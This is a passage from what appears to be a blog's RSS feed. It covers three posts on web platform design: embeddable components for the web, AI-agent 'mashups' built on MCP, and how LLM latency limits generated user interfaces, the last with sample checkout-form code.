<p>Now there is a natural reaction: Well, I don&rsquo;t want super apps or LLMs. The technology is now here and it&rsquo;s being used for good and for bad, and as I learnt from the desktop to mobile <a href="/transition/">transition</a>, the answer is to differentiate and not follow. Lean in to the areas that other platforms can&rsquo;t compete on.</p>
<p>So, how does the web differentiate then?</p>
<p>One area that is ripe for innovation is the act of hyper-linking. We should actively investigate hyper-embedding (also known as transclusions). That is, we need to go beyond just being able to embed a site in a page (<code>iframe</code>) or an API (<code>fetch()</code>), or just merely linking to something (<code>&lt;a&gt;</code>), but instead enable the seamless embedding of functionality that is useful and composable and secure.</p>
<p>The boundary between functional components as described in islands offers so many opportunities for the web. By exposing islands/components/widgets to the browser in a way that it understands that a) there is something that is embeddable, b) what it can do, and c) how to talk to it, all while ensuring there can be security and privacy boundaries between the islands if required, could enable:</p>
<ol>
<li>A cleaner separation for site authors for use across their site. Islands and functionality across the current sites, and then render them in the page. Because the browser understands the intent of islands it enables page-level actions, automations, and chat-bots by the browser to help the user interact with the page.</li>
<li>Deeper integrations across sites. Developers have a habit of injecting any and all 3P JS into the page. A new primitive could separate the pages, ensure memory safety, and data-leakage while enabling even more composability across sites.</li>
<li>Native apps, or other agents to load these islands from other sites, and then render just the island inside their app.</li>
<li>There could be a marketplace and discovery mechanism for functionality for any given island&rsquo;s intent and any given contract.</li>
</ol>
<p>This might sound like Web Components, but we don&rsquo;t have clear contracts or cross-platform embed-ability. It&rsquo;s something that I started to think about in <a href="https://paul.kinlan.me/custom-elements-ecosystem/">Custom Elements Ecosystem</a> but at the time there wasn&rsquo;t a clear need for it. Now there is.</p>
<p>It might also sound like an <code>&lt;iframe&gt;</code>, but these are too heavy. I might just want to embed a small bit of functionality like a checkout form, or a map that has all my own branding.</p>
<p>It might also sound like the <code>&lt;portal&gt;</code> element which was meant as a more privacy-preserving <code>&lt;iframe&gt;</code> element, but again it&rsquo;s too high-level and doesn&rsquo;t allow for the embedding of functionality at a level that smaller than a page.</p>
<p>It might also look like <a href="https://paul.kinlan.me/what-happened-to-web-intents/">Web Intents</a> but this was a page level and not at a component level (and it got pulled out of Chrome).</p>
<p>We are in the start of an era where the <a href="https://paul.kinlan.me/the-headless-web/">web will be headless</a> <em>and</em> we don&rsquo;t have the correct primitives to enable the web to be composable in a way that is useful and for it to thrive.</p>
<p>It&rsquo;s too early to prescribe solutions, but I do believe that a way to define &lsquo;islands&rsquo; or web components as embeddable and a way embed sub-trees and components (islands) is needed and as we do that, I think it&rsquo;s time again to think about exposing intents and contracts on sites, pages and components and make them discoverable.</p>
<p>My hope is that the designers of the web-platform, that is browser vendors and participants of the W3C, should be imagining what the platform could and should look like and how it should continue to differentiate itself in the future, and these are just a couple of early opportunities that I see.</p>
]]></content:encoded></item><item><title>Mashups 2.0</title><link>https://aifoc.us/ai-powered-site-mashups/</link><pubDate>Sat, 24 May 2025 16:00:06 +0000</pubDate><author>contact@aifoc.us (Andre Cipriani Bandarra)</author><guid>https://aifoc.us/ai-powered-site-mashups/</guid><description>&lt;p>&lt;a href="https://aifoc.us/latency/">Paul Kinlan recently wrote&lt;/a> about how latency of AI models to generate UIs with HTML, CSS and JavaScript is decreasing significantly, and how that can lead to user UIs that are ephemeral, dynamically generated, and specialized to the user need at hand.&lt;/p>
&lt;blockquote>
&lt;p>To me, the direction of travel is clear. UI generation to service user-goals is going to happen.&lt;/p>&lt;/blockquote>
&lt;p>Combining this with &lt;a href="https://en.wikipedia.org/wiki/Model_Context_Protocol">Model Context Protocol (MCP)&lt;/a> has got me thinking about the good old &lt;a href="https://en.wikipedia.org/wiki/Mashup_(web_application_hybrid)">site mashups&lt;/a>, and how AI agents can unleash a new, modernized version of them. If you haven&amp;rsquo;t heard about mashups before, here&amp;rsquo;s what Gemini has to say about them:&lt;/p></description><content:encoded><![CDATA[<p><a href="https://aifoc.us/latency/">Paul Kinlan recently wrote</a> about how latency of AI models to generate UIs with HTML, CSS and JavaScript is decreasing significantly, and how that can lead to user UIs that are ephemeral, dynamically generated, and specialized to the user need at hand.</p>
<blockquote>
<p>To me, the direction of travel is clear. UI generation to service user-goals is going to happen.</p></blockquote>
<p>Combining this with <a href="https://en.wikipedia.org/wiki/Model_Context_Protocol">Model Context Protocol (MCP)</a> has got me thinking about the good old <a href="https://en.wikipedia.org/wiki/Mashup_(web_application_hybrid)">site mashups</a>, and how AI agents can unleash a new, modernized version of them. If you haven&rsquo;t heard about mashups before, here&rsquo;s what Gemini has to say about them:</p>
<blockquote>
<p>A site mashup combines data, functionalities, or applications from two or more distinct web sources into a single, integrated user experience. This is typically achieved by leveraging publicly available APIs (Application Programming Interfaces) or RSS feeds, allowing developers to extract and re-present content in a new and innovative way, often without owning the original data sources. For example, a real estate mashup might combine map data from Google Maps with property listings from a real estate website to visually display homes for sale in a specific area.</p></blockquote>
<p>One of the challenges with site mashups was that, while combining functionality from different sites led to unique experiences, those were also frequently niche, sometimes specific to individuals, and the effort to build them meant they would rarely pay off beyond developers building toy applications for themselves.</p>
<p>AI models solve this particular problem by removing the need for a developer to create the UI, and MCP server provide a standardized description of APIs that AI Agents can call or use in the application they are building.</p>
<p>The ability of AI Agents to use tools, standardized with the MCP protocol, allows AI Agents to integrate services into the conversation with the user. However, many user interactions don&rsquo;t work well on a chat interface, an having an UI can be a better way to show structured information or ask for user input, and that&rsquo;s were mini-apps with dynamic UIs and MCP servers come in.</p>
<p>Imagine planning a holiday trip, the user may want to find suitable flight, a hotel that matches their preferences, create an itinerary of local attractions, dinner at restaurants that matches their taste and, finally, book their reviews - this usually requires interacting with different services, and keeping track of your own itinerary.</p>
<p>An AI agent, through the MCP protocol, can use different sources to check reviews for hotels, attractions and restaurants, check their prices and availability, and finally, create all bookings as needed, taking into account the user&rsquo;s own preference. In this workflow, some bits of information can work well in a chat interface, like showing the summary of the reviews of a restaurant. Others might work better with a UI, like showing the location of available hotels in a map, or asking the user to pick attractions they are interested from a list, but checking them.</p>
<p>Being able to create UIs dynamically and instantly would allow those integrations to happen with the best UI possible to the task at hand, and aligned with that user&rsquo;s preferences.</p>
<p>It&rsquo;s possible to imagine entire businesses that only provide services via MCP, being effectively UI-less, and relying on AI agents to drive business to them.</p>
<p>While the performance of the current models is incredible, they are not instant (yet), with that being a significant blocker for this kind of mashup.</p>
<p>Another important blocker is figuring out the monetization model for applications providing content to AI Agents - while for a flight, restaurant, or hotel booking services the benefit is clear, since the AI Agent is directly generating business for them, services like review sites will need a good way to monetize the content they are providing. Maybe the AI Agent would pay for access to those services, on behalf of their user.</p>
]]></content:encoded></item><item><title>latency</title><link>https://aifoc.us/latency/</link><pubDate>Thu, 22 May 2025 19:59:06 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/latency/</guid><description>&lt;p>I spent an &lt;a href="https://paul.kinlan.me/fictitious-web/">evening in a fictitious web&lt;/a>. The faux-browser window hosted at &lt;a href="https://websim.ai/">WebSim.ai&lt;/a> gave me a view into a virtual world that didn&amp;rsquo;t exist, but one that felt like it did. Every page that I visited was created in the moment that I requested it, willed into existence by a generative AI model.&lt;/p>
&lt;p>It was like the early days of the web. Every page felt fresh and unique. Some were high quality, some were low-fi. All were incredibly slow to load. I was on a dial-up connection in 2024. Even when my college&amp;rsquo;s shared connection in &amp;lsquo;98 was on a slow leased line, sites frequently took minutes to load, but at the time it didn&amp;rsquo;t matter, I had this new world to explore.&lt;/p></description><content:encoded><![CDATA[<p>I spent an <a href="https://paul.kinlan.me/fictitious-web/">evening in a fictitious web</a>. The faux-browser window hosted at <a href="https://websim.ai/">WebSim.ai</a> gave me a view into a virtual world that didn&rsquo;t exist, but one that felt like it did. Every page that I visited was created in the moment that I requested it, willed into existence by a generative AI model.</p>
<p>It was like the early days of the web. Every page felt fresh and unique. Some were high quality, some were low-fi. All were incredibly slow to load. I was on a dial-up connection in 2024. Even when my college&rsquo;s shared connection in &lsquo;98 was on a slow leased line, sites frequently took minutes to load, but at the time it didn&rsquo;t matter, I had this new world to explore.</p>
<p>It wasn&rsquo;t until much later in my career that I learned about the importance of latency in web applications. The speed at which a page loads and responds to user interactions can make or break the user experience. In 1993, Jakob Nielsen published his first paper on the topic of response times and how they affect user experience. He identified four key limits for response times:</p>
<blockquote>
<p>0.1 second is about the limit for having the user feel that the system is reacting instantaneously, meaning that no special feedback is necessary except to display the result.</p>
<p>1.0 second is about the limit for the user&rsquo;s flow of thought to stay uninterrupted, even though the user will notice the delay. Normally, no special feedback is necessary during delays of more than 0.1 but less than 1.0 second, but the user does lose the feeling of operating directly on the data.</p>
<p>10 seconds is about the limit for keeping the user&rsquo;s attention focused on the dialogue. For longer delays, users will want to perform other tasks while waiting for the computer to finish, so they should be given feedback indicating when the computer expects to be done. Feedback during the delay is especially important if the response time is likely to be highly variable, since users will then not know what to expect.</p></blockquote>
<p>— <a href="https://www.nngroup.com/articles/response-times-3-important-limits/">Jakob Nielsen - 1993</a></p>
<p>This was written at the dawn of the web and was later <a href="https://www.nngroup.com/articles/response-times-3-important-limits/#:~:text=Web%2DBased%20Application%20Response%20Time">refined in 2014 for web applications</a> and I think that it&rsquo;s interesting that streaming of responses has been used as a way to keep people engaged with LLMs. Yes, streaming of responses has been an interesting hack to improve the perception of speed, and yes, fundamentally these models are doing trillions upon trillions of calculations to get us an answer, but it doesn&rsquo;t change the fact that the underlying model is slow to generate the content.</p>
<p>We are at the early days of the web again. The content or the &ldquo;apps&rdquo; are currently slow to generate and sometimes the experiences like those created with the &ldquo;Canvas&rdquo; apps can feel a little low-fi too, but we are in a <a href="/transition/">transition</a> and it&rsquo;s because these tools feel valuable we are happy to put up with the latency to get a complete response. Seeing these responses generate and stream in feels like the progressive loading of HTML on a slow-connection when you could see the page UI progressively load and JPEGs slowly unblur into full view. It seems to me that we are in the modem phase right now waiting for the broadband transition to happen.</p>
<p>It&rsquo;s not clear to me that the current &ldquo;chat&rdquo; interface are <em>the</em> future — It can be tiring to engage when all I want to do is prod buttons and swipe on things — I&rsquo;d argue that if the future of computing is through tools like LLMs, be it a <a href="/superapps/">superapp</a> or any existing app, chewing through arbitrary tasks that the user requests we are going to need goal-based generative UI.</p>
<p>Ben Thompson has frequently noted that if there is to ba a future in VR/XR based experiences, the sheer amount of content that needs to be created combined with the complexity to create that content, there will need to be a massive shift to systems that generate UI to service a users need based on context and intent.</p>
<blockquote>
<p>AI, however, will enable generative UI, where you are only presented with the appropriate UI to accomplish the specific task at hand. This will be somewhat useful on phones, and much more compelling on something like a smartwatch; instead of having to craft an interface for a tiny screen, generative UIs will surface exactly what you need when you need it, and nothing else.</p>
<p>Where this will really make a difference is with hardware like Orion. Smartphone UI’s will be clunky and annoying in augmented reality; the magic isn’t in being pixel perfect, but rather being able to do something with zero friction. Generative UI will make this possible: you’ll only see what you need to see, and be able to interact with it via neural interfaces like the Orion neural wristband. Oh, and this applies to ads as well: everything in the world will be potential inventory.</p></blockquote>
<p>— <a href="https://stratechery.com/2024/metas-ai-abundance/#:~:text=AI%2C%20however%2C%20will,be%20potential%20inventory.">Ben Thompson - Stratechery - Meta&rsquo;s AI Abundance, October 2024</a></p>
<p>Last year, I wrote a little experiment for a goal-based UI generation using the <a href="https://paul.kinlan.me/projects/reactive-prompts">reactive-prompts</a> library. Given a goal and the data that you already have to solve that goal it would create a user-interface that captures the rest of the information. I was surprised that even 12 months ago it was possible for simple data collection based goals to be generated.</p>
<p>Data collection feels like a good first step in LLMs because we don&rsquo;t need full-applications to get a job done, and the parameters seem to be more easily knowable to our tools. It raises a fundamental question about the concept of an application as we know it today might not exist in the future given that Chain of Thought tools are breaking down a goal (an app in the old context) into finite tasks, and then only requiring intervention when it can&rsquo;t progress.</p>
<p>Today, these UIs can take many seconds to create, and because of the progressive nature of HTML, you can see the UI incrementally load. This might be ok, given that people seem quite happy to wait while the models &ldquo;think&rdquo; or stream their response, but we will see a step-change in engagement and interaction when these UIs start getting to Jacob Nielsen&rsquo;s thresholds for interaction.</p>
<p>Ben Thompson also noted in &lsquo;Sora, Groq and Virtual Reality&rsquo; <em>&quot;<a href="https://stratechery.com/2024/sora-groq-and-virtual-reality/#:~:text=which%20means%20the%20speed%20of%20token%20calculation%20is%20at%20an%20absolute%20premium">which means the speed of token calculation is at an absolute premium.</a>&quot;</em> 100%. How away are we from getting truly instant UIs generated?</p>
<p>Naively, you have to generate HTML, CSS and JS and by <a href="https://npmjs.org/package/tcnt">estimating the number of tokens generated via tcnt</a> the following form is 251 tokens.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">form</span>&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;name&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">button</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;submit&#34;</span>&gt;Submit&lt;/<span style="color:#f92672">button</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">form</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">script</span>&gt;
</span></span><span style="display:flex;"><span>  document.<span style="color:#a6e22e">querySelector</span>(<span style="color:#e6db74">&#34;form&#34;</span>).<span style="color:#a6e22e">addEventListener</span>(<span style="color:#e6db74">&#34;submit&#34;</span>, (<span style="color:#a6e22e">e</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">preventDefault</span>();
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">target</span>.<span style="color:#a6e22e">name</span>.<span style="color:#a6e22e">value</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">email</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">target</span>.<span style="color:#a6e22e">email</span>.<span style="color:#a6e22e">value</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#a6e22e">name</span>, <span style="color:#a6e22e">email</span>);
</span></span><span style="display:flex;"><span>  });
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">script</span>&gt;
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">style</span>&gt;
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">form</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">display</span>: <span style="color:#66d9ef">flex</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">flex-direction</span>: <span style="color:#66d9ef">column</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">input</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">margin-bottom</span>: <span style="color:#ae81ff">10</span><span style="color:#66d9ef">px</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">button</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">background-color</span>: <span style="color:#66d9ef">blue</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">color</span>: <span style="color:#66d9ef">white</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">border</span>: <span style="color:#66d9ef">none</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">padding</span>: <span style="color:#ae81ff">10</span><span style="color:#66d9ef">px</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">cursor</span>: <span style="color:#66d9ef">pointer</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">button</span>:<span style="color:#a6e22e">hover</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">background-color</span>: <span style="color:#66d9ef">darkblue</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">style</span>&gt;
</span></span></code></pre></div><p>I found this <a href="https://github.com/coder543/llm-speed-benchmark/blob/main/results/README.md">LLM speed benchmark</a> to be a good indicative reference for the current state of play. Ranging from 50 tokens per second for the slower but higher quality models to 350 tokens per second for the faster models, potentially lower quality models. Obviously a lot has changed since 2024, but the order of magnitude is the same.</p>
<p>My first reaction (and probably yours) is &ldquo;Hey, it should only take 1 second to generate that form&hellip; what&rsquo;s the problem?&rdquo;</p>
<p>But this is not a realistic example because it was hand-crafted by me for a contrived scenario. When building UI with a prompt, there are a number of other things we have to consider:</p>
<ol>
<li>What is the prompt? We have to include the prompt in the token count and processing time.</li>
<li>Is there &ldquo;thinking&rdquo; required, or is there error correction required? This is a non-linear process and can take a long time to get right.</li>
<li>The latency induced by the network request. Setting up a TLS connection can take 200ms.</li>
</ol>
<p>A more realistic scenario might be a checkout form with a number of items pre-populated, that you need to get the users confirmation for a purchase.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-react" data-lang="react"><span style="display:flex;"><span><span style="color:#66d9ef">import</span> <span style="color:#a6e22e">React</span>, { <span style="color:#a6e22e">useState</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#34;react&#34;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Main App component
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">App</span> <span style="color:#f92672">=</span> () =&gt; {
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// State for form fields
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> [<span style="color:#a6e22e">formData</span>, <span style="color:#a6e22e">setFormData</span>] <span style="color:#f92672">=</span> <span style="color:#a6e22e">useState</span>({
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">fullName</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">email</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">address</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">city</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">zip</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">cardNumber</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">expiryDate</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">cvv</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>  });
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// State for shopping basket items
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> [<span style="color:#a6e22e">basketItems</span>, <span style="color:#a6e22e">setBasketItems</span>] <span style="color:#f92672">=</span> <span style="color:#a6e22e">useState</span>([
</span></span><span style="display:flex;"><span>    { <span style="color:#a6e22e">id</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1</span>, <span style="color:#a6e22e">name</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;Wireless Headphones&#34;</span>, <span style="color:#a6e22e">price</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">129.99</span>, <span style="color:#a6e22e">quantity</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1</span> },
</span></span><span style="display:flex;"><span>    { <span style="color:#a6e22e">id</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">2</span>, <span style="color:#a6e22e">name</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;Smartwatch&#34;</span>, <span style="color:#a6e22e">price</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">199.99</span>, <span style="color:#a6e22e">quantity</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1</span> },
</span></span><span style="display:flex;"><span>    { <span style="color:#a6e22e">id</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">3</span>, <span style="color:#a6e22e">name</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;Portable Bluetooth Speaker&#34;</span>, <span style="color:#a6e22e">price</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">79.99</span>, <span style="color:#a6e22e">quantity</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1</span> },
</span></span><span style="display:flex;"><span>  ]);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Handle input changes for form fields
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">handleInputChange</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">e</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> { <span style="color:#a6e22e">name</span>, <span style="color:#a6e22e">value</span> } <span style="color:#f92672">=</span> <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">target</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">setFormData</span>({ ...<span style="color:#a6e22e">formData</span>, [<span style="color:#a6e22e">name</span>]<span style="color:#f92672">:</span> <span style="color:#a6e22e">value</span> });
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Handle deleting an item from the basket
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">handleDeleteItem</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">id</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">setBasketItems</span>(<span style="color:#a6e22e">basketItems</span>.<span style="color:#a6e22e">filter</span>((<span style="color:#a6e22e">item</span>) =&gt; <span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">id</span> <span style="color:#f92672">!==</span> <span style="color:#a6e22e">id</span>));
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Calculate total price of items in the basket
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">calculateTotal</span> <span style="color:#f92672">=</span> () =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">basketItems</span>
</span></span><span style="display:flex;"><span>      .<span style="color:#a6e22e">reduce</span>((<span style="color:#a6e22e">total</span>, <span style="color:#a6e22e">item</span>) =&gt; <span style="color:#a6e22e">total</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">price</span> <span style="color:#f92672">*</span> <span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">quantity</span>, <span style="color:#ae81ff">0</span>)
</span></span><span style="display:flex;"><span>      .<span style="color:#a6e22e">toFixed</span>(<span style="color:#ae81ff">2</span>);
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e">// Handle checkout button click
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">handleCheckout</span> <span style="color:#f92672">=</span> () =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// In a real application, you would send formData and basketItems to a server
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Checkout initiated!&#34;</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Form Data:&#34;</span>, <span style="color:#a6e22e">formData</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Basket Items:&#34;</span>, <span style="color:#a6e22e">basketItems</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">alert</span>(<span style="color:#e6db74">&#34;Checkout successful! (This is a demo)&#34;</span>); <span style="color:#75715e">// Using alert for demo purposes
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> (
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;min-h-screen bg-gray-100 flex items-center justify-center p-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>      &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;bg-white p-8 rounded-xl shadow-lg w-full max-w-4xl flex flex-col lg:flex-row gap-8&#34;</span>&gt;
</span></span><span style="display:flex;"><span>        {<span style="color:#75715e">/* Customer Information Section */</span>}
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flex-1&#34;</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">h2</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-3xl font-extrabold text-gray-800 mb-6 text-center&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">Checkout</span>
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">h2</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          {<span style="color:#75715e">/* Contact Information */</span>}
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;mb-6&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">h3</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-semibold text-gray-700 mb-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              <span style="color:#a6e22e">Contact</span> <span style="color:#a6e22e">Information</span>
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-1 md:grid-cols-2 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;fullName&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">Full</span> <span style="color:#a6e22e">Name</span>
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;fullName&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;fullName&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">fullName</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
